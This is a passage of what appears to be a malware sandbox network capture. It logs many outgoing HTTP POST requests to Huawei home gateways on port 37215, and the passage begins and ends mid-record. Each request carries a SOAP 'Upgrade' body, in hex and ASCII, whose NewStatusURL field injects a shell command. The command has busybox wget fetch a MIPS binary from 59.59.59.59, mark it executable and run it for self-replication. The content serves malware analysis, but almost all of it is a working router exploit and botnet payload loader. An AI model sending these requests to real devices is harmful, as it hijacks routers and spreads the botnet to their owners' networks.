2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          352192.168.2.155042272.248.32.7637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.550390959 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          353192.168.2.1536802186.239.109.16837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.550417900 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          354192.168.2.155596641.176.145.4737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.550493956 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          355192.168.2.1543248197.80.62.13837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.550512075 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          356192.168.2.1535522197.73.192.9837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.550534010 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          357192.168.2.1536194131.105.212.21437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.551871061 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          358192.168.2.1550552157.6.1.21237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.552202940 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          359192.168.2.1539026168.138.117.20437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.553018093 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          360192.168.2.154750866.90.200.5937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.553061962 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          361192.168.2.1560498197.76.154.3637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.554734945 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          362192.168.2.1547202100.238.158.19937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:47.554934025 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
